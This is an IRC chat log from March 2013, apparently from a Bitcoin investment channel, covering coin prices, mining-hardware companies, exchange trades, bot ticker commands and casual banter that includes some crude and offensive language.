01 00:16:34 happened once to the namecoins Mar 01 00:16:52 death also happend to those once Mar 01 00:17:01 easy Mar 01 00:17:31 yes % Mar 01 00:17:55 i had some namecoins once i think Mar 01 00:18:55 did you? or did mircea_popescu? Mar 01 00:19:03 ahahah! actually, Mar 01 00:19:15 someone had them for me, cause *they* registered some domains for me. Mar 01 00:19:27 tru story, fo realz. Mar 01 00:19:38 what on earth for? Mar 01 00:19:55 dub well at the time a. i was new and b. the entire dns seemed like it may work Mar 01 00:20:00 you're that guy that registered the dictionary right? Mar 01 00:20:06 it wasn't anything worth the mention anyway. Mar 01 00:20:09 nope. Mar 01 00:20:17 probably the glbse ticker squatter too Mar 01 00:20:27 no i think i had mpoe or w/e Mar 01 00:22:06 LTC is doing pretty well this week Mar 01 00:22:26 considering Mar 01 00:22:27 compared to bananas? Mar 01 00:22:33 is ltc the scam one ? Mar 01 00:22:36 nah Mar 01 00:22:38 solidsomething ? Mar 01 00:22:45 yes L = solid Mar 01 00:22:46 ripple Mar 01 00:22:47 lul Mar 01 00:22:48 a ltc is the one altchain that's not really scammy ? Mar 01 00:22:55 nvc is the loud scam currently Mar 01 00:23:05 ppcoin is the jesuscoin Mar 01 00:23:07 kakobrekla soLid hater :D Mar 01 00:23:12 :) Mar 01 00:23:33 ltc back at 7 cents ea Mar 01 00:23:43 usd or btc Mar 01 00:23:44 ? Mar 01 00:23:48 usd Mar 01 00:24:16 what's the block count ? Mar 01 00:27:44 https://www.litecoinglobal.com/security/S.MPOE-PT o hey, mpoe shares worth like a quarter ltc. Mar 01 00:29:32 303599 Mar 01 00:29:34 blox Mar 01 00:29:47 "I have updated average hashrates used in our calculations. Currently LTC is 1.15 times more profitable than BTC. We don't take into account energy costs in our calculations." Mar 01 00:29:49 sounds legit. Mar 01 00:29:54 yeah i like litecoinglobal Mar 01 00:30:32 whenever btc rises too fast ltc plummets Mar 01 00:30:45 then you snag em up and buy btc stocks on ltc global Mar 01 00:31:29 interesting Mar 01 00:31:37 ThickAsThieves is there a webwallet like blockchain.info's ? Mar 01 00:32:06 i dunno Mar 01 00:32:13 this looks kinda promising https://bitmessage.org/wiki/Main_Page Mar 01 00:32:14 i dont store any ltc Mar 01 00:32:20 anyone know Jonathan Warren ? Mar 01 00:32:21 just play it against btc Mar 01 00:32:46 bitcoin gods have smitten me for the blasphemy of questioning tx fees: https://blockchain.info/tx/ff83b94bbcfd52f84e205edebb8dd1c30253d785c666776cb735edba7a93f6b4 Mar 01 00:32:59 still unconfirmed... i shall repent Mar 01 00:33:18 two hours Mar 01 00:34:03 [HAVELOCK] [HIM] 1 @ 17.25 BTC [-] Mar 01 00:40:52 &ticker Mar 01 00:40:54 BTCUSD ticker | Best bid: 33.33000, Best ask: 33.39527, Bid-ask spread: 0.06527, Last trade: 33.39547, 24 hour volume: 127753.02919259, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.64861 Mar 01 00:41:18 )ticker Mar 01 00:41:27 *ticker Mar 01 00:41:34 $ticker Mar 01 00:41:55 •ticker Mar 01 00:42:02 ~ticker Mar 01 00:42:07 ^ticker Mar 01 00:42:11 ¢ticker Mar 01 00:42:23 ׎ticker Mar 01 00:42:32 +ticker Mar 01 00:43:01 ᶘ ᵒᴥᵒᶅ ticker Mar 01 00:43:32 [BTCTC] [COGNITIVE] 9 @ 0.2999 = 2.6991 BTC [-] Mar 01 00:43:49 !ticker ,,ticker Mar 01 00:43:49 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Mar 01 00:45:59 Just lucky i guess. Mar 01 00:47:07 ah im the coolest ticker boy Mar 01 00:47:14 other boys wanna be as cool but Mar 01 00:47:17 there can only be one Mar 01 00:47:18 lalala Mar 01 00:47:56 very suspicious good mood there Mar 01 00:48:07 i concur Mar 01 00:48:40 my 1.76 liter bottle of vodka is still mostly full. Mar 01 00:52:06 mix it with red grapefruit juice Mar 01 00:54:03 im mixing it with fresh orange juice actually. Mar 01 00:56:13 for bonus points find some elderflower to infuse in it then mist with the red grapefruit Mar 01 00:57:13 hey did you guys get another payment from asicminer? Mar 01 00:57:29 2nd or 3rd? Mar 01 00:58:10 i woke up to a payment this morning Mar 01 00:58:14 a nice chunky worth Mar 01 00:58:53 dub since you happen to mention this Mar 01 00:58:56 they paid a ~2% div after the test run Mar 01 00:59:05 http://trilema.com/2012/elderberry-cordial/ Mar 01 00:59:36 sweeet Mar 01 00:59:38 that's duuuubs Mar 01 00:59:43 thanks Mar 01 01:00:23 mircea_popescu: cool Mar 01 01:00:35 one of my fav drinks. Mar 01 01:02:20 goog fails to translate it, do the bugs go in the cordial a la tequila worms? Mar 01 01:03:45 nah, they're extraneous. just happened to have a lot of them Mar 01 01:04:00 for some odd reason. it was like a sort of comedy routine, another bug kept popping p Mar 01 01:04:59 anyway, elderberry cordial is one of those things that make eastern europe eastern europe Mar 01 01:07:06 I don't know if berry and flower are even related but only flowers are harvested in our case Mar 01 01:07:23 i call it elderberry cause it's the name of the plant. Mar 01 01:07:28 otherwise yes, the flower in full bloom are used. Mar 01 01:08:05 probably the same then, you should try mixing some with the vodka Mar 01 01:08:19 nah cause it has sugar added Mar 01 01:08:32 http://polimedia.us/dtng/c/src/136209270610.jpg i wonder if she catches many bad guys. Mar 01 01:08:44 just to flavour not as the acutal mixer Mar 01 01:09:11 impractical footwear. Mar 01 01:09:21 i'm here for you mircea Mar 01 01:09:30 kakobrekla maybe she ain't made for walkin'. Mar 01 01:09:53 BitHub you love me too ? Mar 01 01:10:14 i dunno, id be afraid to hurt myself around her Mar 01 01:10:41 ;;google love hurts Mar 01 01:10:42 Love Hurts - Wikipedia, the free encyclopedia: ; nazareth love hurts (1976) - YouTube: ; Nazareth - Love Hurts - YouTube: Mar 01 01:10:55 ;;google fuck shouldnt hurt (too much) Mar 01 01:10:57 Olivia Newton-John - Love Shouldn't Hurt Lyrics: ; Heartbreak Quotes: ; Breastfeeding is not supposed to hurt: Mar 01 01:11:07 of course mircea i love you very much (no homo) Mar 01 01:11:13 ;;google you're just being sexist. Mar 01 01:11:14 Seth MacFarlane and the Oscars' Hostile, Ugly, Sexist Night : The ...: ; Seth MacFarlane's Sexist Oscar Night: Why everyone is outraged ...: ;;google fine w/e Mar 01 01:11:30 WeLoveFine - for fans by fans: ; We Feel Fine / by Jonathan Harris and Sep Kamvar: ; Weekly Standard's Fred Barnes: Fine, We're The Party Of Whitey ...: Mar 01 01:11:37 ;;google spam detected Mar 01 01:11:38 Why is my Message Detected as Spam?: ; Bayesian spam filtering - Wikipedia, the free encyclopedia: ; Email Spam Detection, Prevention, and Protection Solution – Anti ...: Mar 01 01:11:43 ;;google where? Mar 01 01:11:44 Where's My Refund - It's Quick, Easy and Secure.: ; where - Wiktionary: ; Where | Define Where at Dictionary.com: Mar 01 01:11:51 ok i give. Mar 01 01:12:48 00:11.43 ( gribble ) Where's My Refund Mar 01 01:12:51 actually the nazareth song is pretty good. Mar 01 01:12:52 no refund, this is bitcoin Mar 01 01:12:56 cant do dat! Mar 01 01:12:58 [MPEX] [S.MPOE] 5599 @ 0.00071771 = 4.0185 BTC [-] Mar 01 01:13:00 [MPEX] [S.MPOE] 5000 @ 0.00071528 = 3.5764 BTC [-] Mar 01 01:13:03 [HAVELOCK] [HIM] 1 @ 17.25 BTC [-] Mar 01 01:13:05 [MPEX] [S.MPOE] 1651 @ 0.0007147 = 1.18 BTC [-] Mar 01 01:13:41 four score and eight years ago back when i was still a kid you couldn't finish a party w/o love hurts. Mar 01 01:13:52 it was the final my place or your place settlement. Mar 01 01:17:32 i dont think i've heard that song Mar 01 01:18:49 watch the movie dazed and confused for its standard application Mar 01 01:19:24 as mircea_popescu says Mar 01 01:19:40 that guy jason london was in the news lately LOL Mar 01 01:19:42 http://www.tmz.com/2013/01/29/jason-london-arrested-crapped-assault-mug-shot/ Mar 01 01:19:47 is that the one with the jovovich woman ? Mar 01 01:20:09 the fetish joan of arc / 5th element, lanky model ? Mar 01 01:20:10 yus Mar 01 01:20:27 mila jojojojoYOLOvish Mar 01 01:21:01 in fact one of teh best movies ever Mar 01 01:21:16 "Guess what fa**ot? I f***ing love this. I f***ing own you guys so hard. I'm rich and I'm a motherf***ing famous actor! F***ing look me up, bitch." Mar 01 01:21:18 sad. Mar 01 01:21:27 why do actors end up living such sad, empty existences ? Mar 01 01:21:32 she was real hot in 5th element Mar 01 01:21:35 no clue Mar 01 01:21:40 what a fucking douche bag Mar 01 01:21:40 they're almost like boxers, except without the soothing cranial nerve numbing Mar 01 01:21:50 because its hollywood Mar 01 01:22:00 and you got to do some reall queer ghey ritual stuff to make it Mar 01 01:22:00 haha, he got his shit rocked though Mar 01 01:22:22 "Some guy thought I was hitting on his girl and had me jumped. My wife was in the next room, had no idea what even happened. I hate Arizona." Mar 01 01:22:28 dude srsly ? i loved arizona Mar 01 01:22:38 same Mar 01 01:22:42 http://www.imdb.com/name/nm0518715/ he's been in a great many things I've never heard of Mar 01 01:22:43 possibly for the same reasons. Mar 01 01:22:55 speaking of which... Mar 01 01:22:56 i guess now i have to see Dazed and Confused huh Mar 01 01:23:01 any smickles these days? Mar 01 01:23:02 yes you do Mar 01 01:23:11 ;;seen smickles Mar 01 01:23:11 smickles was last seen in #bitcoin-assets 2 weeks, 5 days, 21 hours, 12 minutes, and 30 seconds ago: pong Mar 01 01:23:40 nope smickles has been awol. Mar 01 01:23:42 i hope he's fine Mar 01 01:23:52 it came out when I was in high school, my parents saw it and told me someone had made a movie about me and my friends Mar 01 01:24:13 i bet he's just at the bunny ranch Mar 01 01:24:17 i know i would be Mar 01 01:24:50 does TMZ really counts as news... Mar 01 01:24:51 dub lmao Mar 01 01:25:00 Namworld dude totally. i trust them above reddit. Mar 01 01:25:24 don't see the movie dazed and confused Mar 01 01:25:29 unless you enjoy comas Mar 01 01:33:38 France’s industry minister Tuesday called for a lower euro and said the European Central Bank’s [ECB] role should be reinterpreted, wading back into a currency debate that had been calmed by an agreement between the world’s top finance ministers earlier in the month to refrain from competitive devaluations of their currencies Mar 01 01:33:40 o boy. Mar 01 01:35:22 the movie proceeded to be watched by my group of friends any time a night wsa over and people were in varios states of stupor/comedown Mar 01 01:35:27 [BTCTC] [B.YABMC] 1 @ 0.00849 BTC [-] Mar 01 01:35:48 conservatively I'd guess I've watched it 100 times Mar 01 01:36:51 at 10 bux a pop the movie industry of america made > 1k dolla off this great success. Mar 01 01:37:42 in the western world we had innovated to the point of VHS by that time Mar 01 01:38:23 piracy! Mar 01 01:38:54 this was also far enough int eh past that a movie ticket was closer to $5 Mar 01 01:39:04 also piracy. Mar 01 01:39:23 and tax evasion. Mar 01 01:40:34 el mariachi Mar 01 01:41:59 [MPEX] [S.MPOE] 4113 @ 0.0007306 = 3.005 BTC [+] Mar 01 01:42:01 [MPEX] [S.MPOE] 2550 @ 0.00074007 = 1.8872 BTC [+] Mar 01 01:42:02 [MPEX] [S.MPOE] 16250 @ 0.00074837 = 12.161 BTC [+] Mar 01 01:42:12 damu assbot Mar 01 01:42:18 how u do that Mar 01 01:47:29 has anyone tried calling smickles? Mar 01 01:57:24 [BTCTC] [S.DICE-PT] 3313 @ 0.00642 = 21.2695 BTC [-] Mar 01 01:57:54 i didn't wanna bother him really Mar 01 02:01:17 just an address here, no number: http://starpas.azcc.gov/scripts/cgiip.exe/WService=wsbroker1/corp-detail.p?name-id=L18030781 Mar 01 02:08:53 ;;ticker Mar 01 02:08:54 BTCUSD ticker | Best bid: 33.40000, Best ask: 33.43800, Bid-ask spread: 0.03800, Last trade: 33.43800, 24 hour volume: 126480.50958443, 24 hour low: 30.90200, 24 hour high: 34.51541, 24 hour vwap: 32.69548 Mar 01 02:28:04 So maybe Yifu ran away with the money after all Mar 01 02:35:03 [HAVELOCK] [HIM] 1 @ 17.25 BTC [-] Mar 01 02:37:03 [HAVELOCK] [SDICE] 3 @ 0.6815 = 2.0445 BTC [-] Mar 01 02:37:04 [HAVELOCK] [SDICE] 5 @ 0.682 = 3.41 BTC [+] Mar 01 02:37:06 [HAVELOCK] [SDICE] 5 @ 0.687 = 3.435 BTC [+] Mar 01 02:38:04 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [-] Mar 01 02:40:18 oh yeah dividends Mar 01 02:42:43 it paid ? Mar 01 02:42:49 dub im with mod6 Mar 01 02:43:00 no pressing business, just hoping he's ok. Mar 01 02:43:16 Bowjob wait,what ? link ? Mar 01 02:47:25 [MPEX] [S.MPOE] 9809 @ 0.00075 = 7.3568 BTC [+] Mar 01 02:49:09 im just curious, I know he was holding coin for at least mrstringpuller Mar 01 02:52:54 [MPEX] [S.MPOE] 12356 @ 0.0007537 = 9.3127 BTC [+] Mar 01 02:57:40 wait no it did not lol Mar 01 02:57:52 i just said.. oh yeah, meaning dividends coming up Mar 01 02:57:53 lol Mar 01 02:58:09 i meant re yifu Mar 01 02:58:54 Well, we haven't heard from him yet, we'll see Mar 01 02:59:08 but today is the deadline, so i expected him to go.. blah blah, batch 1 all sent Mar 01 02:59:52 [BTCTC] [GSDPT] 1 @ 0.0064 BTC [-] Mar 01 02:59:57 [BTCTC] [GSDPT] 399 @ 0.0065 = 2.5935 BTC [+] Mar 01 03:01:26 [BTCTC] [BITVPS] 60 @ 0.00417 = 0.2502 BTC [-] Mar 01 03:07:12 Avalols will be had Mar 01 03:11:31 if it turns out to be a scam, ill consider it a failed 50% satoshi bet Mar 01 03:12:50 i think its good to se new faces in mining Mar 01 03:13:13 i still have no clue on how to run avalon Mar 01 03:13:14 lol Mar 01 03:13:16 ;;bc,stats Mar 01 03:13:19 Current Blocks: 223671 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 104 blocks | Next Difficulty In About: 14 hours, 51 minutes, and 25 seconds | Next Difficulty Estimate: 4400531.71063 | Estimated Percent Change: 20.52911 Mar 01 03:13:20 it cant be that hard Mar 01 03:13:28 kakobrekla: how is project x coming along? Mar 01 03:13:42 which of the four? Mar 01 03:14:13 damn. come on bfl Mar 01 03:14:30 right now there still a chance of making my coin back Mar 01 03:14:38 bullshit fabrication lab Mar 01 03:14:39 on what? Mar 01 03:14:43 on bfl Mar 01 03:14:52 you bought their shit? Mar 01 03:14:53 how much did u spend Mar 01 03:15:17 I bought a pga single early on and an i teh top 100 order for an upgrade Mar 01 03:15:41 ur prolly better off hoarding the coins Mar 01 03:15:42 and we had respect for you! Mar 01 03:16:28 like fuck you did. but hey, I waited till their pga existed and there wasnt a whole lot of choise about upgrading Mar 01 03:16:35 choice* Mar 01 03:17:13 damn. ASIC miner Mar 01 03:17:16 :/ Mar 01 03:17:23 i didnt get any Mar 01 03:17:23 lol Mar 01 03:26:45 avalols lol Mar 01 03:27:28 lol wait. waitwait Mar 01 03:27:47 dub doesn't have btc cause they suck but he has bfl receipts of equity investing becauise they don't suck ?! Mar 01 03:27:48 ajhahahaha Mar 01 03:28:46 yeah man bfl ? btc any day Mar 01 03:28:55 s/?/> Mar 01 03:29:16 i got an email from bfl asking for another 100btc, just to secure my order more, legit? Mar 01 03:29:24 wat Mar 01 03:29:24 no wai ?! Mar 01 03:29:28 jk Mar 01 03:29:42 hi sir please send money to secure your sent money more Mar 01 03:29:46 haha Mar 01 03:29:49 imagine that Mar 01 03:29:54 what we mean is this : we put the money you sent as a payment for a toyota camry Mar 01 03:30:02 now if we don't make the next payment we lose the car Mar 01 03:30:04 so... Mar 01 03:30:30 toyadda lol Mar 01 03:30:37 what we mean is "we need to go on another holiday, so.......yeah could you send another secure payment to make the last payment more secure?" Mar 01 03:30:55 please to securitize your previous payment Mar 01 03:31:03 camry shmamry, corolla or nothing Mar 01 03:31:18 toyota coyote. Mar 01 03:31:25 that'd kickass. Mar 01 03:31:27 "we need to go on another holiday because we're so stressed up and people keep calling us all the time where are the bfl's and we just need to get away to france for a month or something yaknow?" Mar 01 03:31:46 everyone lubes their machinery Mar 01 03:31:52 it's required for functioning Mar 01 03:32:11 moar like "we're going to need a lot more than a quarter to buy micon a clue" Mar 01 03:32:20 wait. wait omg wtf. we have ycombinator to thank for disqus ?! Mar 01 03:32:23 o burn them with fire. Mar 01 03:34:13 *sigh,. avalol got the bflu Mar 01 03:35:51 My god... Zerohedge commenters are significantly more retarded than redditors Mar 01 03:36:44 http://www.zerohedge.com/news/2013-02-28/bitcoin-your-thoughts Mar 01 03:37:58 this is true Mar 01 03:38:07 i quoted a diff article yest, was horribly clueless. Mar 01 03:39:11 Where are the intelligent forums these days? Reddit and slashdot used to be ok 4 and 12 years ago Mar 01 03:39:17 http://www.zerohedge.com/news/2013-02-26/alternative-currency-goes-mainstream-bitcoin-atms-emerge Mar 01 03:39:19 get a load of that Mar 01 03:39:28 replete with the "hands stuffed in ears going lalala bitcoin is a scam" Mar 01 03:39:39 I guess it's all on twitter now Mar 01 03:39:40 Bugpowder i would guess some sections of irc. Mar 01 03:39:53 My twitter feed is excellent Mar 01 03:39:58 something bashful likes to pretend they're the solution, but i dunno. Mar 01 03:40:08 ya well, you probably curate it. Mar 01 03:40:47 I interact with nature editors, star scientists, great writers, etx Mar 01 03:40:56 Yes curation is Mar 01 03:40:57 Key Mar 01 03:41:04 well if you curate it then everything is fine. Mar 01 03:41:23 you can turn zh into gold by selecting the one nugged to be found in there Mar 01 03:41:25 (somewhere) Mar 01 03:41:35 the idea is to have something that works by itself. Mar 01 03:41:41 Also a 3:1 ratio of following to followers Mar 01 03:41:58 followers means pretty much jack. Mar 01 03:42:11 i turned my twitter acct into a rss feed of trilema, i still have k's of followers. Mar 01 03:42:56 I try to maintain a ratio that makes me look important. Like the line at the club Mar 01 03:43:01 lol Mar 01 03:43:09 then 1:3 ? Mar 01 03:43:19 Yah Mar 01 03:43:20 Oops Mar 01 03:43:30 at least it wasn't brains. Mar 01 03:46:24 [MPEX] [S.MPOE] 11800 @ 0.00075 = 8.85 BTC [-] Mar 01 03:47:32 satoshi dice not getting much love these days Mar 01 03:48:21 whats it at, 13k ? Mar 01 03:49:20 yah Mar 01 03:49:35 [BTCTC] [COGNITIVE] 6 @ 0.2999 = 1.7994 BTC [-] Mar 01 03:51:27 People are always about a week slow on sdice Mar 01 03:52:14 I am pretty sure there is another whale network with at least 10,000 coins doing a fair amount of betting Mar 01 03:52:25 well da fuck. Mar 01 03:52:37 so i quit twitter about 2 years ago ? cause it fucked up the site and it didn't work for me anymore. Mar 01 03:52:42 so now you had me test it out and it works Mar 01 03:52:57 i guess ima have to get back into it now ;/ Mar 01 03:53:38 Yeah dude, get back in. It is not busted anymore Mar 01 03:53:56 And the quality level is very high in the right circles Mar 01 03:54:09 Plus it only takes a minute to write a post Mar 01 03:54:19 Rather than the 2 hours a good blog Mar 01 03:54:19 heh. Mar 01 03:54:23 Post takes Mar 01 03:54:33 it only takes me 20-30 minutes really. Mar 01 03:54:47 [MPEX] [S.MPOE] 5018 @ 0.0007537 = 3.7821 BTC [+] Mar 01 03:56:36 o wow, they added a request archive link Mar 01 03:56:45 bejesus twitter desuckified in the interim Mar 01 04:01:34 haha i followed mod6 Mar 01 04:01:37 what's your name bugsy ? Mar 01 04:02:48 Are you hiring mircea? Mar 01 04:02:58 XD Mar 01 04:03:45 The whales live! Are the whales really rich people? Or just people who acquired BTC early on and held it. Mar 01 04:04:44 now the monster task of purging the 1k+ romanian hotties i used to follow Mar 01 04:04:50 BitHub yes. Mar 01 04:05:01 ;;google mpex old style pr Mar 01 04:05:02 MPEx hiring: old style PR : Bitcoin: ; MPEx hiring : old style PR pe Trilema - Un blog de Mircea Popescu.: ; FAQ - MPEx: Mar 01 04:06:12 This is the best reddit post I've ever thing! Mar 01 04:06:16 seen* Mar 01 04:06:23 wtf Mar 01 04:06:43 I made a lisp when I typed... Mar 01 04:06:48 lol ? Mar 01 04:08:31 Is bitcoinstore.com down for anyone else? Mar 01 04:08:36 Roger Ver is a poop. Mar 01 04:09:02 old style pr? Mar 01 04:09:07 yea. Mar 01 04:09:13 leflor@machine-zero:~/bitcoin/src$ ping bitcoinstore.com Mar 01 04:09:15 PING bitcoinstore.com (50.97.67.189) 56(84) bytes of data. Mar 01 04:09:18 Mar 01 04:09:19 Mar 01 04:09:20 Mar 01 04:09:33 Ctrl-^ Mar 01 04:10:00 dude all these nineteen yearolds that meanwhile are like... stale. Mar 01 04:10:23 wtf you on about? Mar 01 04:15:33 my twitter acct Mar 01 04:15:37 purging the lists Mar 01 04:16:19 what is your twitter Mar 01 04:17:05 mircea_popescu Mar 01 04:17:10 !ticker X.IDIFF.MAR Mar 01 04:17:11 These beans is shit. Mar 01 04:17:16 !ticker m X.IDIFF.MAR Mar 01 04:17:17 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (25 shares, 1.90 BTC), 30D: 0.0429 / 0.06479693 / 0.07595 (343 shares, 22.23 BTC) Mar 01 04:17:39 25 have sold since last Thursday? Hmm. Mar 01 04:18:22 Buy buy buy Mar 01 04:18:22 LOL the X.IDIFF mini Bidwall at .59 came down Mar 01 04:18:32 HAHA Mar 01 04:18:47 .52 I think Mar 01 04:19:00 oh yea .529 :P Mar 01 04:21:06 ;;calc .20 * 4407941.34969 + 4407941.34969 Mar 01 04:21:06 5289529.61963 Mar 01 04:21:17 guess he didn't wanna take the chance :P Mar 01 04:25:45 mpex is a scam waaaah Mar 01 04:25:58 mircea_popescu: is a big meanie head who runs a stock exchange Mar 01 04:29:51 what'd i do now Mar 01 04:32:55 asic miner dividend was less than i hoped, but at least they paid off debt:) Mar 01 04:34:03 ;;rating Mar 01 04:34:03 Error: "rating" is not a valid command. Mar 01 04:34:04 how often is it suppose to be, once a month? Mar 01 04:34:09 ;;rate Mar 01 04:34:09 (rate []) -- Enters a rating for in the amount of . Use optional field to enter any notes you have about this user. must be the user's GPG-registered username, Your previously existing rating, if any, will be overwritten. Mar 01 04:34:21 ;;getrating Mar 01 04:34:21 (getrating ) -- Get rating information for . Mar 01 04:34:26 ;;trust Mar 01 04:34:26 Error: "trust" is not a valid command. Mar 01 04:34:30 ;;help Mar 01 04:34:30 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Mar 01 04:34:33 ;;commands Mar 01 04:34:34 8ball, ?, about, action, add, alert, alias, announce, announce add, announce list, announce remove, any, aol, apply, apropos, asks, at, auth, author, avgprc, azn, balance, ban add, ban list, ban remove, base, bashorg, bc,24hprc, bc,avgprc, bc,bitpenny, bc,blockdiff, bc,blocks, bc,bounty, bc,btcguild, bc,calc, bc,calcd, bc,convert, bc,deepbit, bc,diff, bc,diffchange, bc,eligius, (10 more messages) Mar 01 04:34:51 &8ball Mar 01 04:34:52 One would be wise to think so. Mar 01 04:34:55 ;) Mar 01 04:35:13 wassup nao Mar 01 04:39:48 oookay... Mar 01 04:39:53 so my twitter is back in business. Mar 01 04:40:28 :D Mar 01 04:40:51 need me to run it for you mircea? Mar 01 04:43:00 haha run it for me ? Mar 01 04:43:32 the social media marketing side of mpex Mar 01 04:44:04 1btc a week :) Mar 01 04:46:32 there is a website!? Mar 01 04:46:37 it is now Mar 01 04:46:50 ;;everify Mar 01 04:46:50 (everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Mar 01 04:46:58 ;;eauth thestringpuller Mar 01 04:46:59 Request successful for user thestringpuller, hostmask thestringpuller!~leflor@99-39-97-12.lightspeed.tukrga.sbcglobal.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0FF2943DA179E169 Mar 01 04:47:16 kakobrekla: haha sweet Mar 01 04:47:28 :) Mar 01 04:47:45 ;;everify freenode:#bitcoin-otc:5af29369e5025bbf7423455eb3d2b10f55b11c8fc3be18129ad56e58 Mar 01 04:47:46 You are now authenticated for user thestringpuller with key 0FF2943DA179E169 Mar 01 04:47:47 you kids and your python Mar 01 04:47:49 ;;ident Mar 01 04:47:50 You are identified as user thestringpuller, with GPG key id 0FF2943DA179E169, key fingerprint 6ACE36E786F39A4ADC4506DE0FF2943DA179E169, and bitcoin address None Mar 01 04:49:43 new rating mr popescu Mar 01 04:49:46 :P Mar 01 04:49:49 hm ? Mar 01 04:49:51 ;;rated mircea_popescu Mar 01 04:49:52 You rated user mircea_popescu on Thu Feb 28 18:49:21 2013, giving him a rating of 4, and supplied these additional notes: upgraded to mah nigga. Mar 01 04:49:57 racist Mar 01 04:50:01 lol Mar 01 04:51:18 the "what'd I do now" made me trust you more Mar 01 04:51:23 comment* Mar 01 04:57:22 site looking good kakobrekla Mar 01 04:57:28 ty Mar 01 04:58:12 if you'd use bootstrap you might get some VC money Mar 01 04:58:21 lolzz Mar 01 05:01:24 lmao Mar 01 05:02:23 https://twitter.com/Mircea_Popescu << so i brought my old twitter out of retirement Mar 01 05:02:26 if anyone cares. Mar 01 05:26:49 so NVC is falling, LTC is rising further Mar 01 05:26:56 .0755 USD now Mar 01 05:29:50 ;;ticker Mar 01 05:29:51 BTCUSD ticker | Best bid: 33.41001, Best ask: 33.49999, Bid-ask spread: 0.08998, Last trade: 33.41001, 24 hour volume: 75885.19008028, 24 hour low: 30.90200, 24 hour high: 34.51541, 24 hour vwap: 33.00577 Mar 01 05:30:14 its a different feeling Mar 01 05:30:21 lookin at 31.90 from this side Mar 01 05:30:39 lol Mar 01 05:31:03 ;;tsbl Mar 01 05:31:04 Error: "tsbl" is not a valid command. Mar 01 05:31:07 ;;tslb Mar 01 05:31:24 Time since last block: 3 minutes and 33 seconds Mar 01 05:38:00 http://mpex.co/faq.html#11 Mar 01 05:38:07 added socket and sierracharts plugin courtesy of kako Mar 01 05:39:32 i need the ticker data Mar 01 05:40:19 lol, i was just thinking "hmm, i wonder if there is a python plug in for vim..." the first return from google is this stack-exchange article where this has 11 points: Mar 01 05:40:31 I really like the emacs editor for python because of it's smart tabbing for instance if I have something like this Mar 01 05:40:37 EMACS?! Mar 01 05:40:40 haha f that Mar 01 05:40:49 [BTCTC] [S.DICE-PT] 400 @ 0.00643 = 2.572 BTC [+] Mar 01 05:41:12 http://stackoverflow.com/questions/9172802/setting-up-vim-for-python Mar 01 05:43:16 [BTCTC] [BASIC-MINING] 18 @ 0.35 = 6.3 BTC [+] Mar 01 05:43:28 maybe i'll have to try something like this: http://sontek.net/blog/detail/turning-vim-into-a-modern-python-ide#window-splits Mar 01 05:44:28 perl is seemingly on constant decay mode Mar 01 05:49:19 People loading up for the dividend it seems Mar 01 05:50:15 whats the div gonna be Mar 01 05:50:29 like 1.4% Mar 01 05:50:39 a little less maybe Mar 01 05:51:01 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Mar 01 05:54:18 ;;calc (14000/100000000)/0.006 Mar 01 05:54:18 0.0233333333333 Mar 01 05:54:24 More like 2.3% Mar 01 05:55:13 hey! like asicminer! Mar 01 05:55:35 ALL HAIL ASICMINER Mar 01 05:55:40 AND ITS GLORIOUS DIVS Mar 01 05:57:58 ;;tslb Mar 01 05:58:04 Time since last block: 8 minutes and 11 seconds Mar 01 05:59:38 course if we consider something like the .5 asicminer is trading instead of the original .1 in the calculation Mar 01 05:59:46 the div drops to something more like .45% Mar 01 06:02:51 Have they listed it on any exchange yet? Mar 01 06:02:57 I kinda want to buy. Mar 01 06:03:42 Maybe someone in here is selling. Mar 01 06:03:58 no selling Mar 01 06:04:02 stay away from me Mar 01 06:04:08 :) Mar 01 06:04:20 lol i think the forum was doing the selling Mar 01 06:04:46 its too late Mar 01 06:05:00 On bitcointalk? I've seen that thread, but I have no idea how to buy one. Mar 01 06:05:01 selling, trading was suppose to stop on the 28th. Mar 01 06:05:12 Why? Mar 01 06:05:40 I don't want in on the IPO, I know that's over. Just the secondary market. Mar 01 06:05:40 so friedcat could go through all the request and emails and assign shares to new people, its alot of work yaknow Mar 01 06:05:45 prolly a klundy implementation of post-ex date Mar 01 06:05:47 Ah. Mar 01 06:06:06 just wait a few weeks Mar 01 06:06:07 .006? Mar 01 06:06:17 sry i'm late Mar 01 06:06:17 i think they're doing something under the name bitfountain Mar 01 06:06:57 Any idea when trading will resume? Mar 01 06:07:14 well they just paid the first div, sooooo Mar 01 06:07:20 few weeks? Mar 01 06:07:22 [BTCTC] [BASIC-MINING] 2 @ 0.34 = 0.68 BTC [-] Mar 01 06:07:40 Hm.. what's BASIC-MINING? Mar 01 06:07:49 I know, probably unrelated. Mar 01 06:07:49 [BTCTC] [ESECURITYSABTC] 1 @ 0.63899 BTC [-] Mar 01 06:08:04 be ready to pay high for them tho Mar 01 06:08:12 BitHub: how high? Mar 01 06:08:30 where you are, look at the moon or sun. Mar 01 06:08:35 Heh. Mar 01 06:08:51 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Mar 01 06:08:52 I've been told 1 BTC is a borderline acceptable price. Mar 01 06:09:03 yeah i was think around that Mar 01 06:09:06 1btc Mar 01 06:10:25 https://bitcointalk.org/index.php?topic=144319.0 Mar 01 06:10:36 girl says .5 to .75 or so Mar 01 06:12:41 i was pretty far off with that sdice div Mar 01 06:12:55 i think i just got the 14k mixed up with the % in my head Mar 01 06:13:14 although i dont think .0060 is fair avg price to use Mar 01 06:13:27 !ticker m s.dice Mar 01 06:13:28 [MPEX:S.DICE] 1D: 0.00580004 / 0.00626259 / 0.0063799 (55247 shares, 345.99 BTC), 7D: 0.00572194 / 0.0062105 / 0.00638999 (316226 shares, 1,963.92 BTC), 30D: 0.0042 / 0.00602991 / 0.007395 (6837075 shares, 41,226.99 BTC) Mar 01 06:13:39 wh not ? 30 day vwap. Mar 01 06:13:45 i suppose Mar 01 06:13:55 but that includes the tranches Mar 01 06:14:12 which 